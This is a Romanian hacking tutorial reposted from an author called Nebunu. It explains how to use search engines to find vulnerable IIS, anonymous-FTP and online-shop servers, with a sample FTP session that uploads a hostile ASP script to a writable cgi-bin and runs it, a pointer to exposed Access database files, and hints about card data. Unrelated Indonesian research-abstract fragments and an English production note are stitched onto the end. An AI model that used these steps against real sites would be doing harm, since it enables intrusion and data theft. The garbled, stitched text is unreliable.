Motoarele de cautare reprezinta dupa parerea mea o sursa nesecata de informatii pentru oricine nu doar pentru un hacker.O sa enumar cele mai cunoscute motoare de cautare apoi o sa trec la

subiect.www.yahoo.comwww.excite.com astalavista.box.skwww.gogle.comwww.lycos.com La acestea se mai adauga si motoarele de pe serverele mari sau de pe anumite portaluri cum ar fi:http://home.ro,

www.kappa.ro,www.xnet.ro,www.top100.ro etc.

Folosind aceste motoare puteti gasi orice informatii doriti tastand numele programului dorit sau ceva ce este legat de subiectul in cauza.Cum pot fi folosite motoarele de cautare pentru hack?Simplu.Cu ajutorul lor

obtinem o lista de servere dintre care unele pot fi vulnerabile.Odata am cautat pe excite niste servere dupa un cuvant cheie spre exemplu 'IIS server'.Am primit o lista de cateva sute de servere dintre care cateva erau vulnerabile. Majoritatea aveau activat un cont ftp anonim, si se gaseau directoare in care era permisa executia programelor.Am gasit si servere care dadeau oricui acces la cgi-bin!!Cand gasim un astfel de server tastam 'dir' pentru a vedea directoarele la care avem acces:open ftp.server.comconnected to server.com server running aturn..username(server.com):guest

annonymous acces enabled ,send your complete e-mail adress as password

password:mulder@fbi.comyou are logged indirusersetchomecgi-bin !!(ar fi ceva) cd cgi-binput script_ostil.aspquit

Apoi rulam programul script_ostil.asp si putem obtine acces: www.server.com/cgi-bin/script_ostil.asp

Evident putem gasi si alte exploituri cum ar fi pentru versiunea de server Proftpdput ..Rezultatul este denial of service.

Prin tatarea de cuvinte cheie ca 'shopping online' 'virtual shop' 'buying' etc putem obtine o lista de servere comerciale care sunt mai vulnerabile ca celelalte servere datorita programelor de gestiune a bazelor de date pe care le contin.Cel mai penibil program de acest tip este cart32.exe localizat in

directoarele cgi-bin sau scripts.Baza de date este administrata cu ajutorul programului c32web.exe care are o groaza de vulnerabilitati de care prefer sa nu vorbesc pentru ca nu doresc sub nici un chip sa incalc

legea.Acest program cart32 ruleaza sub servere NT.Sub servere pe Unix este foarte popular programul shop.pl care este la fel de vulnerabil,sau shopping.cgi.Deseori bazele de date

sunt lasate neprotejate sau cu parola implicita.Am intalnit siteuri care aveau baza de date in Access care puteau fi incarcate pe calculator!!!

www.sitecomercial.com/_private/database.mbd

Compania britanica Cerberus se ocupa cu tastarea acestor programe,detalii pe

www.packetstorm.securify.com.Apropo www.packetstorm.securify.com are un excelent motor de cautare.Detalii despre carding,exploituri,siteuri vulnerabile, gasiti tastand 'cart32' 'card' 'cart'.

Folosind programul cgifound.exe va puteti face o idee despre sistemul de operare al gazdei. Spre exemplu daca in urma scanarii apar directoarele _vti_pvt sau cgi-win atunci inseamna ca serverul ruleaza sub Windows NT.

Am gasit o groaza de site-uri comerciale vulnerabile dar nu va sfatuiesc sa obtineti acces deoarece sunteti o tinta sigura.Chiar daca obtineti acces total si puteti edita logfile-ul nu ati scapat.O sa scriu un tutorial despre cum puteti fi prins si despre cum puteti sa va feriti de acest lucru.

Cred ca o sa fie cel mai util tutorial pe care o sa-l scriu,deoarece documentatii de hack se gasesc este tot,dar astfel de documentatii nu prea am vazut.

Un hacker foarte bun 'The Prophet' a fost prins chiar daca a 'lucrat' de la un loc public iar Mafiaboy cel care a blocat yahoo-ul a fost prins pentru ca a avut gura mare,asa cum e o persoana care se lauda pe guestbook-ul meu.

(12)

*Inteleg ca va place ce cititi dar va rog sa mai si votati pentru ca ma simt prost de tot cand sunt la concurenta cu niste site-uri porno tocmai pe locul 127. *

Daca aveti ceva interesant de semnalat,propuneri sugestii sau critici ,trimiteti un email la nebunu@home.ro

Va rog mult sa cititi acest articol pana la capat,deoarece valoreaza mult mai mult decat celelalte dupa parerea mea.

Atentie

: Acest tutorial , nu-mi apartine, autorul lui este Nebunu, m-am gandit sa-l expun pe site-ul meu din mai multe motive motive:

1.Deoarece siteul www.nebunu.home.ro nu mai exista.

2.Este un tutorial foarte util, ce cuprinde mai multe tehnici de hacking.

3.Autorul tutorialului a scris aceste randuri deoarece este impotriva cenzurii informationale si cred ca merita expus in continuare pe siteuri.

Referensi

Garis besar

Dokumen terkait

Berdasarkan hasil pengujian penelitian SDGD WDEHO PDND VHOLVLK ZDNWX GDQ H¿VLHQVL waktu yang dibutuhkan sebelum dan sesudah adanya cache dapat disimpulkan antara lain:

Strategi dalam upaya peningkatan implementasi pengendalian hama terpadu menggunakan tanaman refugia adalah dengan meningkatkan efektifitas penggunaan lahan, penguatan

Secara umum perpustakaan merupakan sumber informasi, pendidikan, penelitian, perservasi, dan pelestarian khasanah budaya bangsa serta tempat rekreasi yang sehat, murah dan

Standar Beban Kerja adalah banyaknya jenis pekerjaan yang dapat dilaksanakan oleh sesorang tenaga kesehatan profesional dalam satu tahun kerja sesuai dengan

[r]

Enzim invertase dapat diaplikasikan pada industri pangan maupun non- pangan.Hidrolisis substrat sukrosa dengan enzim invertase dapat menghasilkan produk berupa

Penelitian potensi bakteri kitinolitik untuk mengendalikan penyakit busuk pangkal batang lada telah dilakukan di Laboratorium dan Rumah Kaca Kelompok Peneliti

 Lower but more specialized labor skills  Easier production planning and control  Higher equipment utilization (70% to 90%).